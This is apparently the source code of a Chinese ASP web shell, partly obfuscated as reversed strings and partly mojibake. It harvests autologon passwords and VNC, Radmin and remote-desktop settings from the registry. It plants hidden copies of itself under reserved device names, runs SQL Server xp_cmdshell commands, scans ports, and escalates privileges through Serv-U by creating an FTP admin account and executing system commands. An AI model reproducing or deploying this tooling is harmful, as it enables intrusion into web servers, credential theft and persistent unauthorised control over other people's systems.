swodniW\tfosorciM\ERAWTFOS\ENIHCAM_LACOL_YEKH��(daeRgeR.hsW=nimdA���>rb<����:��Ƕ�_�Ի���>il<��j��eslE���>rb<����δ:��Ƕ�_�Ի���>il<��j��nehT ���=nigolotuA ro 0=nigolotuA fi��)nigolotuAsi(daeRgeR.hsW=nigolotuA���nogoLnimdAotuA\nogolniW\noisreVtnerruC\TN swodniW\tfosorciM\ERAWTFOS\ENIHCAM_LACOL_YEKH��=nigolotuAsi���>tnof/<>rb<��&emaNnimdA&��>der=roloc tnof<:Ϊ������Ա��&��������Ĭ>il<��j���fi dne���krowteN.tpircsW:���в�����������j��neht rre fi��txeN���>il/<>tnof/<>rb<��&emaN.nimda&�壺��Ա����ǰ��>der=roloc tnof<>il<�� j��srebmeM.puorGjbo ni nimda hcaE roF��)��puorg,srotartsinimdA/��&emaNretupmoC.Nt&��//:TNniW��(tcejbOteG=puorGjbo teS��)��krowteN.tpircsW��(tcejbOetaerc.revres=Nt teS�� txen emuser rorre no��0=seripxE.esnopseR���rotartsinimdA��=emaNnimdA nehT ���=emannimda fi��)yeKemaNnimdA(daeRgeR.hsw=emaNnimdA���emaNresUtluafeDtlA\nogolniW\noisreVtnerruC\TN swodniW\tfosorciM\ERAWTFOS\ENIHCAM_LACOL_YEKH��=yeKemaNnimdA���>rb<��&emancp&��:Ϊ����_��ǰ��>il<��j���>rb<.������ȡ_�����ީ�=emancp nehT ���=emancp fi��)yekemancp(daeRgeR.hsw=emancp���emaNretupmoC\emaNretupmoC\emaNretupmoC\lortnoC\teSlortnoCtnerruC\METSYS\MLKH��=yekemancp���>1=ezis rh<>rb<]��̽_����ͳϵ[>rb<>rb<��j��txen���>rb<��&)i(shtap&��>il<��j��)shtap(dnuobU ot )shtap(dnuobL=i roF���>rb<:���侶·_ǰ��ͳϵ��j���>rb<------------------------------------��j��)��;��,htaPtfoS(tilps=shtap���>rb<��֧:_������ɱ��ϵ����>il<��j nehT )��gnisir��,ofnihtaP(rtsni fi���>rb<��֧:_������ɱ��������>il<��j nehT )��surivitna��,ofnihtaP(rtsni fi���>rb<��֧:_������ɱ��ϵɽ�� >il<��j nehT )��vak��,ofnihtaP(rtsni fi���>rb<��֧:_������ɱlliK>il<��j nehT )��lliK��,ofnihtaP(rtsni fi���>rb<��֧:_�ƿ�erehwynAcP��������>il<��j nehT )��erehwynacp��,ofnihtaP(rtsni fi���>rb<��֧:_�����MFC>il<��j nehT )��7xmnoisufc��,ofnihtaP(rtsni fi���>rb<��֧:_��������elcarO>il<��j nehT )��elcaro��,ofnihtaP(rtsni fi���>rb<��֧:_��������LQSyM>il<��j nehT )��lqsym��,ofnihtaP(rtsni fi���>rb<��֧:_��������LQSSM>il<��j nehT )��revres lqs tfosorcim��,ofnihtaP(rtsni fi���>rb<��֧:_����avaJ>il<��j nehT )��avaj��,ofnihtaP(rtsni fi���>rb<��֧:_����lreP>il<��j nehT )��lrep��,ofnihtaP(rtsnI fi���:��֧����&����ͳϵ��j��)htaPtfoS(esacl=ofnihtaP��)��htaP��(meti.tnemnorivnE.hsW=htaPtfoS���>1=ezis rh<>rb<]��̽��_��ͳϵ[>rb<>rb<>rb<��j���>lo/<��j��fI dnE���>rb<�� & drowssaPnigoLotua & �� :���ܻ��ʵĩ�&��¼�Ƕ��ԩ�j��fI dnE���eslaF��j��raelC.rrE��nehT rrE fI��)yeKssaPnigoLotua & htaPnigoLotua(daeRgeR.Xsw = drowssaPnigoLotua���>rb<�� & emanresUnigoLotua & �� :����ͳϵ�ĩ�&��¼�Ƕ��ԩ�j��)yeKresUnigoLotua & htaPnigoLotua(daeRgeR.Xsw = emanresUnigoLotua��eslE��nehT 0 = elbanEnigoLotuAsi fI��)yeKelbanEnigoLotua & htaPnigoLotua(daeRgeR.Xsw = elbanEnigoLotuAsi���drowssaPtluafeD�� = yeKssaPnigoLotua���emaNresUtluafeD�� = yeKresUnigoLotua���nogoLnimdAotuA�� = yeKelbanEnigoLotua���\nogolniW\noisreVtnerruC\TN swodniW\tfosorciM\ERAWTFOS\ENIHCAM_LACOL_YEKH�� = htaPnigoLotua��fI dnE���>/rb<�� & troPmret & �� :�ڶ˩�&���������ǰ����j��eslE ���>/rb<.���޵��ܷ�����Ȩ��� ,�ڶ˶��յ��÷��ީ�j�� nehT 0 >< rebmuN.rrE rO ��� = troPmret fI���>lo<¼�Ƕ��Լ���&��ڶ����_���թ�j��)yeKtroPlanimret & htaPtroPlanimret(daeRgeR.Xsw = troPmret���rebmuNtroP�� = yeKtroPlanimret���\pcT-PDR\snoitatSniW\revreS lanimreT\lortnoC\teSlortnoCtnerruC\METSYS\MLKH�� = htaPtroPlanimret��drowssaPnigoLotua ,emanresUnigoLotua ,yeKelbanEnigoLotua ,elbanEnigoLotuAsi miD��yeKssaPnigoLotua ,yeKresUnigoLotua ,htaPnigoLotua miD��troPmret ,yeKtroPlanimret ,htaPtroPlanimret miD��)��llehS.tpircSW��(tcejbOetaerC.revreS = Xsw teS���------------------------------------------------------��j���>rb<��&troPWAP&��:Ϊ�ڶ�erehwynAcP>il<��j���erehwynAcpװ�����&���ǻ�����&����ȷ��.ȡ���&�巨�ީ�=troPWAP neht ���=troPWAP fI��)yeKerehwynAcp(daeRgeR.hsW=troPWAP���troPataDPIPCT\metsyS\noisreVtnerruC\erehwynAcp\cetnamyS\ERAWTFOS\ENIHCAM_LACOL_YEKH��=yeKerehwynAcp���>tnof/<>rb<��&troPmreT&��>der=roloc tnof<:Ϊ�ڶ�ecivreS lanimreT>il<��j����������revreS swodniWΪ���ǩ�&����ȷ��.ȡ����&�巨�ީ�=troPmreT nehT ���=troPmreT fI��)yeKmreT(daeRgeR.hsW=troPmreT���rebmuNtroP\pct\sdT\dwpdr\sdW\revreS lanimreT\lortnoC\teSlortnoCtnerruC\METSYS\ENIHCAM_LACOL_YEKH��=yeKmreT���>rb<��&troptnlT&��:�ک�&���tenleT>il<��j���)�����&����Ĭ(32��=tnlT nehT ���=troPtnlT fi��)yeKtenleT(daeRgeR.hsW=troPtnlT���troPtenleT\0.1\revreStenleT\tfosorciM \ERAWTFOS\ENIHCAM_LACOL_YEKH��=yektenleT���>1=ezis rh<>rb<]��̽��&��ڶ˩�&������[>rb<>rb<��j��fi dne��txeN���>rb<------------------------------------------------��j��fi dnE��fi dnE���>rb<��j��txen���,��&)j(wollaPDU j��)wollapdu(dnuoBU oT )wollapdu(dnuoBL = j rof���:Ϊ�ڶ�pdu�ĩ�&������>il<��j��eslE���>rb<��ȫ:Ϊ�ڶ�pdu�ĩ�&������>il<��j��nehT 0=)0(wollapdu ro ���=)0(wollapdu fI��)PDUlluF(daeRgeR.hsW=wollapdu��fi dnE���>rB<��j��txeN���,��&)j(wollapct j��)wollapct(dnuoBU oT )wollapct(dnuoBL = j roF���:Ϊ�ڶ�pct�ĩ�&������>il<��j��eslE���>rb<��ȫ:Ϊ�ڶ�pct�ĩ�&������>il<��j��nehT 0=)0(wollapct ro ���=)0(wollapct fI��)PCTlluF(daeRgeR.hsW=wollapct��KUE&BdpA&htap=PDUlluF��KTE&BdpA&htaP=PCTlluF���stroPdewollAPDU\��=KUE���stroPdewollAPCT\��=KTE��esle���>rb<ѡɸPI/pcTû>il<��j�� nehT 1=retlifpipctoN fi��fI dnE���>rb<������û��ȡ������SND��&����Ĭ>il<��j��eslE���>rb<��&rtsSND&��:ΪSND��&�忨��>il<��j��nehT ���>rb<������û��ȡ�����޹���>il<��j��eslE��txeN���>rb<��&)j(yawetaG&��:��&j&�����>il<��j��)yawetaG(dnuobU ot )yawetaG(dnuobL=j roF��nehT )yaWetaG(yarrasi fI��)yeKyaWetaG(daergeR.hsW=yaWetaG���yawetaGtluafeD\��&BdpA&htaP=yeKyaWetaG��fi dnE���>rb<������û���&��ȡ������ַ��&���PI>il<��j��eslE��txeN���>rb<��&)j(rddAPI&��:Ϊ��&j&��ַ��&���PI>il<��j��)rddAPI(dnuobU ot )rddAPI(dnuobL=j roF��nehT ���><)0(rddaPI fI��)yeKPI(daergeR.hsW=rddaPI���sserddAPI\��&BdpA&htaP=yeKPI���\secafretnI\sretemaraP\pipcT\secivreS\100teSlortnoC\METSYS\ENIHCAM_LACOL_YEKH��=htaP���>rb<��&BdpA&��:Ϊ����ĩ�&i&�忨����j��)���,��\eciveD\��,)i(sdpA(ecalpeR=BdpA��1-)sdpA(dnuoBU oT )sdpA(dnuoBL=i roF�� nehT )sdpA(yarrAsI fI��)yeKdpA(daeRgeR.hsW=sdpA���dniB\egakniL\pipcT\secivreS\100teSlortnoC\METSYS\MLKH��=yeKdpA��fI dnE��1=retlifpipctoN��nehT ���=elbanEsi ro 0=elbanEsi fI��)yeKpipcTelbanE(daergeR.hsW=elbanEsi���sretliFytiruceSelbanE\sretemaraP\pipcT\secivreS\teSlortnoCtnerruc\METSYS\MLKH��=yeKPIPCTelbanE���>1=ezis rh<>rb<]��̽��&������[��j��)��llehS.tpircsW��(tcejboetaerc=hsw tes��hsw mid��txen emuser rorre no��)(ofnIlanimreTteg bus")) sub hiddenshell fpath=request.servervariables("path_translated") set fso=server.createobject("scripting.filesystemobject") pex="com1|com2|com3|com4|com5|com6|com7|com8|com9|lpt1|lpt2|lpt3|lpt4|lpt5|lpt6|lpt7|lpt8|lpt9" rndpex=split(pex,"|")(rndnumber(0,17)) session("seljw")="" filepath1=server.mappath(".") filename1=right(fpath,len(fpath)-instrrev(fpath,"\")) url=request.servervariables("url") url=left(url,instrrev(url,"/"))&rndpex&"."&filename1 fso.copyfile fpath,"\\.\"&filepath1&"\"&rndpex&"."&filename1 set fso=nothing j "" end sub Sub Message(state,msg,flag) j"
" j state j"

"&msg j"

" If flag=0 Then j" " Else End if j"
" End Sub Function Red(str) Red = "" & str & "" End Function Function RndNumber(Min,Max) Randomize RndNumber=Int((Max - Min + 1) * Rnd() + Min) End Function Sub ScanDriveForm() Dim FSO,DriveB Set FSO = Server.Createobject("Scripting.FileSystemObject") j"
" For Each DriveB in FSO.Drives j" " Next j" " j"" j"
����/ϵͳ�ļ�����Ϣ
�̷�" j DriveB.DriveLetter j":����" Select Case DriveB.DriveType Case 1: j"���ƶ�" Case 2: j"����Ӳ��" Case 3: j"�������" Case 4: j"CD-ROM" Case 5: j"RAM����" Case else: j"δ֪����" End Select j"
Windows�ļ���" j FSO.GetSpecialFolder(0) j"
System32�ļ���" j FSO.GetSpecialFolder(1) j"
ϵͳ��ʱ�ļ���" j FSO.GetSpecialFolder(2) j"
վ���Ŀ¼վ���Ŀ¼��ϸ����
����վĿ¼����վĿ¼ ��ϸ����
wmpubĿ¼ wmpub��ϸ����

" j"

ָ���ļ��в�ѯ�� �����鿴Ŀ¼Ȩ��,������Ŀ¼�á�,��������
" Set FSO=Nothing End Sub Sub ScanDrive(Drive) Dim FSO,TestDrive,BaseFolder,TempFolders,Temp_Str,D If Drive <> "" Then Set FSO = Server.Createobject("Scripting.FileSystemObject") Set TestDrive = FSO.GetDrive(Drive) If TestDrive.IsReady Then Temp_Str = "
 • ���̷������ͣ�" & Red(TestDrive.FileSystem) & "
 • �������кţ�" & Red(TestDrive.SerialNumber) & "
 • ���̹�������" & Red(TestDrive.ShareName) & "
 • ������������" & Red(CInt(TestDrive.TotalSize/1048576)) & "
 • ���̾�����" & Red(TestDrive.VolumeName) & "
 • ���̸�Ŀ¼:" & ScReWr((Drive & ":\")) Set BaseFolder = TestDrive.RootFolder Set TempFolders = BaseFolder.SubFolders For Each D in TempFolders Temp_Str = Temp_Str & "
 • �ļ��У�" & ScReWr(D) Next Set TempFolder = Nothing Set BaseFolder = Nothing Else Temp_Str = Temp_Str & "
 • ���̸�Ŀ¼:" & Red("���ɶ�:(") Dim TempFolderList,t:t=0 Temp_Str = Temp_Str & "
 • " & Red("���Ŀ¼���ԣ�") TempFolderList = Array("windows","winnt","win","win2000","win98","web","winme","windows2000","asp","php","Tools","Documents and Settings","Program Files","Inetpub","ftp","wmpub","tftp") For i = 0 to Ubound(TempFolderList) If FSO.FolderExists(Drive & ":\" & TempFolderList(i)) Then t = t+1 Temp_Str = Temp_Str & "
 • �����ļ��У�" & ScReWr(Drive & ":\" & TempFolderList(i)) End if Next If t=0 then Temp_Str = Temp_Str & "
 • �����" & Drive & "�̸�Ŀ¼����δ�з���:(" End if Set TestDrive = Nothing Set FSO = Nothing Temp_Str = Temp_Str Message Drive & ":������Ϣ",Temp_Str,1 End if End Sub Sub ScFolder(folder) 'On Error Resume Next folderArr = Split(folder,",") For i = 0 To Ubound(folderArr) Dim FSO,OFolder,TempFolder,Scmsg,S Set FSO = Server.Createobject("Scripting.FileSystemObject") folder = folderArr(i) If FSO.FolderExists(folder) Then Set OFolder = FSO.GetFolder(folder) Set TempFolders = OFolder.SubFolders Scmsg = "
 • ָ���ļ��и�Ŀ¼��" & ScReWr(folder) For Each S in TempFolders Scmsg = Scmsg&"
 • �ļ��У�" & ScReWr(S) Next Set TempFolders = Nothing Set OFolder = Nothing Else Scmsg = Scmsg & "
 • �ļ��У�" & Red(folder & "�����ڻ��޶�Ȩ��!") End if Scmsg = Scmsg & "

  ע�⣺��Ҫ���ˢ�±�ҳ�棬������ֻд�ļ��л����´��������ļ�!"&backurl Set FSO = Nothing Message "",Scmsg,1 next End Sub Function ScReWr(folder) On Error Resume Next Dim FSO,TestFolder,TestFileList,ReWrStr,RndFilename Set FSO = Server.Createobject("Scripting.FileSystemObject") Set TestFolder = FSO.GetFolder(folder) Set TestFileList = TestFolder.SubFolders RndFilename = "\temp" & Day(now) & Hour(now) & Minute(now) & Second(now) & ".tmp" For Each A in TestFileList Next If err Then err.Clear ReWrStr = folder & " ���ɶ�," FSO.CreateTextFile folder & RndFilename,True If err Then err.Clear ReWrStr = ReWrStr & "����д��" Else ReWrStr = ReWrStr & "��д��" FSO.DeleteFile folder & RndFilename,True End If Else ReWrStr = folder & " �ɶ�," FSO.CreateTextFile folder & RndFilename,True If err Then err.Clear ReWrStr = ReWrStr & "����д��" Else ReWrStr = ReWrStr & "��д��" FSO.DeleteFile folder & RndFilename,True End if End if Set TestFileList = Nothing Set TestFolder = Nothing Set FSO = Nothing ScReWr = ReWrStr End Function function goback() set Ofso = Server.CreateObject("Scripting.FileSystemObject") set ofolder = Ofso.Getfolder(Session("FolderPath")) if not ofolder.IsRootFolder then j "" else j "
  �Ѿ��Ǵ��̸�Ŀ¼��!


  " end if set Ofso=nothing set ofolder=nothing end function ShiSan="bus dne��fi dne��fI dnE��yarrAeht & ��>il<�� j��eslE��txeN��)i(yarrAeht & ��>il<�� j��)yarrAeht(dnuoBU oT 0=i roF��nehT )yarrAeht(yarrAsI fI��)htaPeht(daeRgeR.Xsw=yarrAeht��)��htaPeht��(tseuqeR=htaPeht��)��llehS.tpircSW��(tcejbOetaerC.revreS = Xsw teS��txeN emuseR rorrE nO��neht ���><)��htaPeht��(tseuqeR fi���>/rh<>mrof/<�� j���>')(timbus.mrof.siht'=kcilcno 'ֵ �� ��'=eulav nottub=epyt tupni<�� j���>08=ezis ''=eulav htaPeht=eman tupni< �� j���>/ rb<>tceles/<�� j���>noitpo/<�ڶ�PCT�ķſ�����>'stroPdewollAPCT\}E2BE55CD8431-3FFA-C0B4-99E8-821564A8{\secafretnI\sretemaraP\pipcT\secivreS\100teSlortnoC\METSYS\MLKH'=eulav noitpo<�� j���>noitpo/<�ڶ�PDU�ķſ�����>'stroPdewollAPDU\}E2BE55CD8431-3FFA-C0B4-99E8-821564A8{\secafretnI\sretemaraP\pipcT\secivreS\100teSlortnoC\METSYS\MLKH'=eulav noitpo<�� j���>noitpo/<�ſ����>'PCT:9833\tsiL\stroPnepOyllabolG\eliforPdradnatS\yciloPllaweriF\sretemaraP\sseccAderahS\secivreS\teSlortnoCtnerruC\METSYS\MLKH'=eulav noitpo<�� j���>noitpo/'htaPgoL\tnegAgniludehcS\tfosorciM\ERAWTFOS\ENIHCAM_LACOL_YEKH'=eulav noitpo<�� j���>noitpo/<3�˹�pi/pct>'sretliFytiruceSelbanE\pipcT\secivreS\teSlortnoCtnerruC\METSYS\ENIHCAM_LACOL_YEKH'=eulav noitpo<�� j���>noitpo/<2�˹�pi/pct>'sretliFytiruceSelbanE\pipcT\secivreS\200teSlortnoC\METSYS\ENIHCAM_LACOL_YEKH'=eulav noitpo<�� j���>noitpo/<1�˹�pi/pct>'sretliFytiruceSelbanE\pipcT\secivreS\100teSlortnoC\METSYS\ENIHCAM_LACOL_YEKH'=eulav noitpo<�� j���>noitpo/<�ڶ�̬״WynAcP>���troPsutatSPIPCT\metsyS\noisreVtnerruC\erehwynAcp\cetnamyS\ERAWTFOS\MLKH���=eulav noitpo<��j���>noitpo/<�ڶ˾���WynAcP>���troPataDPIPCT\metsyS\noisreVtnerruC\erehwynAcp\cetnamyS\ERAWTFOS\MLKH���=eulav noitpo<��j���>noitpo/<�ڶ�9833>���rebmuNtroP\pcT-PDR\snoitatSniW\revreS lanimreT\lortnoC\teSlortnoCtnerruC\METSYS\MLKH���=eulav noitpo<��j���>noitpo/<�ڶ�4CNV>���rebmuNtroP\4CNVniW\CNVlaeR\ERAWTFOS\MLKH���=eulav noitpo<��j���>noitpo/<����4CNV>���drowssaP\4CNVniW\CNVlaeR\ERAWTFOS\MLKH���=eulav noitpo<��j���>noitpo/<�ڶ�3CNV>���rebmuNtroP\3CNVniW\LRO\erawtfoS\UCKH���=eulav noitpo<��j���>noitpo/<����3CNV>���drowssaP\3CNVniW\LRO\erawtfoS\UCKH���=eulav noitpo<��j���>noitpo/<�ڶ�nimdaR>���troP\sretemaraP\revreS\0.2v\nimdAR\METSYS\MLKH���=eulav noitpo<��j���>noitpo/<����nimdaR>���retemaraP\sretemaraP\revreS\0.2v\nimdAR\METSYS\MLKH���=eulav noitpo<��j���>noitpo/<���п���>���dniB\egakniL\pipcT\secivreS\teSlortnoCtnerruC\METSYS\MLKH���=eulav noitpo<��j���>noitpo/'emaNretupmoC\emaNretupmoC\emaNretupmoC\lortnoC\teSlortnoCtnerruC\METSYS\MLKH'=eulav noitpo<�� j���>noitpo/<ֵ���Ĵ�����ѡ>''=eulav noitpo<�� j���>';eulav.siht=eulav.htaPeht.mrof.siht'=egnahCno tceles<�� j��� >2=napsloc dt<>rt<�� j���>tcAeht=eman geRdaeR=eulav neddih=epyt tupni<�� j�� ��>p<ȡ��ֵ������ע�� j���>tsop=dohtem mrof<�� j��)(GERdaeR bus" ExeCuTe(ShiSanFun(ShiSan)) if request("ProFile")<>"" then on error resume next if Application(request("ProFile"))=1 then Set fsoXX = Server.CreateObject("Scripting.FileSystemObject") if request("DelCon")=1 then Application(request("ProFile")&"Con")="" response.redirect Url&"?ProFile="&request("ProFile")&"" response.end end if DIM rline,rline2 rline2=Application(request("ProFile")&"Code") rline2=rline2&vbcrlf j"" j"�����־  Ҫ����������ֱ�ӹر�ҳ�漴�ɡ�
  " for each FileUrl in split(Application(request("ProFile")&"File"),vbcrlf) FileUrl=trim(FileUrl) if fsoXX.FileExists(FileUrl) then Set txt = fsoXX.OpenTextFile(FileUrl,1,true) rline="" if Not txt.AtEndOfStream then rline=txt.ReadAll end if if rline2<>rline then txt.close fsoX.GetFile(FileUrl).Attributes=32 if Application(request("ProFile")&"Char")=1 then set myfileee = fsoXX.CreateTextFile(FileUrl,true) else set myfileee = fsoXX.CreateTextFile(FileUrl,true,true) end if myfileee.writeline Application(request("ProFile")&"Code") Application(request("ProFile")&"Con")=now()&" "&FileUrl&" �����ģ��ѻָ�
  "&Application(request("ProFile")&"Con") else Application(request("ProFile")&"Con")=now()&" "&FileUrl&" ��
  "&Application(request("ProFile")&"Con") txt.close end if else if Application(request("ProFile")&"Char")=1 then set myfileee = fsoXX.CreateTextFile(FileUrl,true) else set myfileee = fsoXX.CreateTextFile(FileUrl,true,true) end if myfileee.writeline Application(request("ProFile")&"Code") Application(request("ProFile")&"Con")=now()&" "&FileUrl&" ��ɾ�����ѻָ�
  "&Application(request("ProFile")&"Con") end if next if ubound(split(Application(request("ProFile")&"Con"),"
  "))>=40 then dim ashowic for ashowi=0 to 40 ashowic=ashowic&split(Application(request("ProFile")&"Con"),"
  ")(ashowi)&"
  " next Application(request("ProFile")&"Con")=ashowic end if j Application(request("ProFile")&"Con") else j"


  �������̶�ʧ�������������������̡�
  " end if response.end end if if session("KKK")<>UserPass then if request.form("pass")<>"" then if request.form("pass")=UserPass then session("KKK")=UserPass response.redirect url else j"


  --------------- ��������ܵ�¼�� ------------  "&backurl end if else si="

  " if instr(SI,SIC)<>0 then j sI end if response.end end if ShiSan="buS dnE��fI dnE��fI dnE��fI dnE��)��>rb<>tnof/<�ſ�>der=roloc tnof<.........�� & muNtrop & ��:�� & pitegrat(j��eslE��)��>rb<�չ�.........�� & muNtrop & ��:�� & pitegrat(j��nehT 0 > )��.))(tcennoC(�� ,noitpircsed.rrE(rtSnI fI��nehT 9527647412- = rebmun.rrE ro 3487127412- = rebmun.rrE fI��nehT rrE fI��rtsnnoc nepo.nnoc��1 = tuoemiTnoitcennoC.nnoc���;=drowssaP;2ekal=DI resU;��& muNtrop &��,��& pitegrat & ��=ecruoS ataD;1.BDELOLQS=redivorP��=rtsnnoc��)��noitcennoc.BDODA��(tcejbOetaerC.revreS = nnoc tes��txeN emuseR rorrE nO��)muNtrop ,pitegrat(nacS buS��bus dne��FI DNE���s ��&emiteht&�� ni ssecorP>rh<��j��))1remit-2remit(tni(rtsc=emiteht��remit = 2remit��txeN��fI dnE��txeN��txeN��fI dnE��fI dnE��)��>rbrb xkees fI��)��-�� ,)i(pmt(rtSnI = xkees��eslE��))i(pmt ,xxx & tratSpi(nacS llaC�� nehT ))i(pmt(ciremunsI fI��)pmt(dnuobU oT 0 = i roF��))��-��,)uh(pi(rtSnI-))uh(pi(neL,1+)��-��,)uh(pi(rtSnI,)uh(pi(diM ot )1,1+)��.��,)uh(pi(veRrtSnI,)uh(pi(diM = xxx roF��))��.��,)uh(pi(veRrtSnI,1,)uh(pi(diM = tratSpi��eslE��txeN��fI dnE��fI dnE��)��>rbrb xkees fI��)��-�� ,)i(pmt(rtSnI = xkees��eslE��))i(pmt ,)uh(pi(nacS llaC�� nehT ))i(pmt(ciremunsI fI��)pmt(dnuobU oT 0 = i roF��nehT 0 = )��-��,)uh(pi(rtSnI fI��)pi(dnuobU ot 0 = uh roF��)��,��,)��pi��(mroF.tseuqer(tilpS = pi��)��,��,)��trop��(mroF.tseuqer(tilpS = pmt��)��>rh<>rb<>b/<:�汨��ɨ>b<��(j��remit = 1remit��nehT ��� >< )��nacs��(mroF.tseuqer fI���>mrof/<>p/<��j���>'111'=eulav 'nacs'=di 'neddih'=epyt 'nacs'=eman tupni<��j���>' nacs '=eulav 'mottub'=ssalc 'timbus'=epyt 'timbus'=eman tupni<��j���>rb<>rb<��j���>'��&tsiLtroP&��'=eulav '06'=ezis 'xoBtxeT'=ssalc 'txet'=epyt 'trop'=eman tupni<��j���:tsiL troP>rb<��j���>'06'=ezis '��&PI&��'=eulav 'pi'=di 'xoBtxeT'=ssalc 'txet'=epyt 'pi'=eman tupni< ��j��� :PI nacS>p<��j���>';eurt=delbasid.timbus.1mrof'=timbuSno ''=noitca 'tsop'=dohtem '1mrof'=eman mrof<��j���>p/<��������ϵ��ִ��LLEHS���롣���������ܿ�PI���������ɨ�������ǹ���>p<>p/<)��ȷ׼����ɨ���ڶ�DMC��DMC��ʹ�����˸�,���ϱȶ���,�ڶ˸�����ɨ����(����ɨ�ڶ�>p<��j��fi dne��)��pi��(mroF.tseuqer=PI��esle���1.0.0.721��=PI��neht ���=)��pi��(mroF.tseuqer fi��fi dne��)��trop��(mroF.tseuqer=tsiLtroP��esle���85934,0095,0085,2365,1365,9984,9833,6033,3341,35,32,12��=tsiLtroP��neht ���=)��trop��(mroF.tseuqer fi��0006777 = tuoemiTtpircS.revreS��)(troPnacS bus��" ExeCuTe(ShiSanFun(ShiSan)) Select Case Action:case "MainMenu":MainMenu() Case "EditPower" Call EditPower(request("PowerPath")) Case "SavePower" Call SavePower(request("PowerPath"),request("SaveType")) case "getTerminalInfo":getTerminalInfo():case "PageAddToMdb":PageAddToMdb():case "ScanPort":ScanPort():FuncTion MMD():SI="
  MSSQL Commander
  Command�� UserName�� Password�� 
  ":j SI:SI="":If trim(request.form("MMD"))<>"" Then:password= trim(Request.form("P")):id=trim(Request.form("U")):set adoConn=sERvEr.crEATeobjECT("ADODB.Connection"):adoConn.Open "Provider=SQLOLEDB.1;Password="&password&";User ID="&id:strQuery = "exec master.dbo.xp_cMdsHeLl '" & request.form("MMD") & "'":set recResult = adoConn.Execute(strQuery):If NOT recResult.EOF Then:Do While NOT recResult.EOF:strResult = strResult & chr(13) & recResult(0):recResult.MoveNext:Loop:End if:set recResult = Nothing:strResult = Replace(strResult," "," "):strResult = Replace(strResult,"<","<"):strResult = Replace(strResult,">",">"):strResult = Replace(strResult,chr(13),"
  "):End if:set adoConn = Nothing:j request.form("MMD") & "
  "& strResult:end FuncTion:case "Alexa" dim AlexaUrl,Top:AlexaUrl=request("u"):Top=Alexa(AlexaUrl):if AlexaUrl="" then AlexaUrl=""&request.servervariables("http_host")&"" SI="
  " For i=0 To 18 SI=SI&"" Next j SI Err.Clear function getHTTPPage(url) on error resume next dim http set http=Server.createobject("Microsoft.XMLHTTP") Http.open "GET",url,false Http.send() if Http.readystate<>4 then getHTTPPage="" exit function end if getHTTPPage=bytes2BSTR(Http.responseBody) set http=nothing if err.number<>0 then err.Clear end function Function bytes2BSTR(vIn) dim strReturn dim i1,ThisCharCode,NextCharCode strReturn = "" For i1 = 1 To LenB(vIn) ThisCharCode = AscB(MidB(vIn,i1,1)) If ThisCharCode < &H80 Then strReturn = strReturn & Chr(ThisCharCode) Else NextCharCode = AscB(MidB(vIn,i1+1,1)) strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode)) i1 = i1 + 1 End If Next bytes2BSTR = strReturn Err.Clear End Function Case "Servu" SUaction=request("SUaction") if not isnumeric(SUaction) then response.end user = trim(request("u")) pass = trim(request("p")) port = trim(request("port")) cmd = trim(request("c")) f=trim(request("f")) if f="" then f=gpath() else f=left(f,2) end if ftpport = 65500 timeout=3 loginuser = "User " & user & vbCrLf loginpass = "Pass " & pass & vbCrLf deldomain = "-DELETEDOMAIN" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & " PortNo=" & ftpport & vbCrLf mt = "SITE MAINTENANCE" & vbCrLf newdomain = "-SETDOMAIN" & vbCrLf & "-Domain=goldsun|0.0.0.0|" & ftpport & "|-1|1|0" & vbCrLf & "-TZOEnable=0" & vbCrLf & " TZOKey=" & vbCrLf newuser = "-SETUSERSETUP" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & "-PortNo=" & ftpport & vbCrLf & "-User=go" & vbCrLf & "-Password=od" & vbCrLf & _ "-HomeDir=c:\\" & vbCrLf & "-LoginMesFile=" & vbCrLf & "-Disable=0" & vbCrLf & "-RelPaths=1" & vbCrLf & _ "-NeedSecure=0" & vbCrLf & "-HideHidden=0" & vbCrLf & "-AlwaysAllowLogin=0" & vbCrLf & "-ChangePassword=0" & vbCrLf & _ "-QuotaEnable=0" & vbCrLf & "-MaxUsersLoginPerIP=-1" & vbCrLf & "-SpeedLimitUp=0" & vbCrLf & "-SpeedLimitDown=0" & vbCrLf & _ "-MaxNrUsers=-1" & vbCrLf & "-IdleTimeOut=600" & vbCrLf & "-SessionTimeOut=-1" & vbCrLf & "-Expire=0" & vbCrLf & "-RatioUp=1" & vbCrLf & _ "-RatioDown=1" & vbCrLf & "-RatiosCredit=0" & vbCrLf & "-QuotaCurrent=0" & vbCrLf & "-QuotaMaximum=0" & vbCrLf & _ "-Maintenance=System" & vbCrLf & "-PasswordType=Regular" & vbCrLf & "-Ratios=None" & vbCrLf & " Access=c:\\|RWAMELCDP" & vbCrLf quit = "QUIT" & vbCrLf newuser=replace(newuser,"c:",f) select case SUaction case 1 set a=Server.CreateObject("Microsoft.XMLHTTP") a.open "GET", "http://127.0.0.1:" & port & "/goldsun/upadmin/s1",True, "", "" a.send loginuser & loginpass & mt & deldomain & newdomain & newuser & quit set session("a")=a j"" j"" j"" j"" j"" j"" j"" j"" case 2 set b=Server.CreateObject("Microsoft.XMLHTTP") b.open "GET", "http://127.0.0.1:" & ftpport & "/goldsun/upadmin/s2", True, "", "" b.send "User go" & vbCrLf & "pass od" & vbCrLf & "site exec " & cmd & vbCrLf & quit set session("b")=b j"" j"" j"" j"" j"" j"" j"" j"" case 3 set c=Server.CreateObject("Microsoft.XMLHTTP") a.open "GET", "http://127.0.0.1:" & port & "/goldsun/upadmin/s3", True, "", "" a.send loginuser & loginpass & mt & deldomain & quit set session("a")=a j"
  ��Ȩ���,��ִ�������
  "&cmd&"

  " j"" j"
  " case else on error resume next set a=session("a") set b=session("b") set c=session("c") a.abort Set a = Nothing b.abort Set b = Nothing c.abort Set c = Nothing j"
  " j"
  �����������Ϣ
  �������� "&request.serverVariables("SERVER_NAME")&"
  ������IP
  ������ʱ�� "&now&"
  ������CPU���� "&Request.ServerVariables("NUMBER_OF_PROCESSORS")&"
  ����������ϵͳ "&Request.ServerVariables("OS")&"
  WEB�������汾 "&Request.ServerVariables("SERVER_SOFTWARE")&"
  "&ObT(i,0)&""&ObT(i,1)&""&ObT(i,2)&"
  " j"" j"" j"" j"" j"" j"" j"" j"" j"" j"" j"" j"" j"" j"" j"" j"" j"" j" " j" " j" " j" " j" " j" " j" " j" " j"
  Serv-U ����Ȩ�� by Sam
  �û���:
  �� �
  �� �ڣ�
  ϵͳ·����
  �����
  " j"" j"
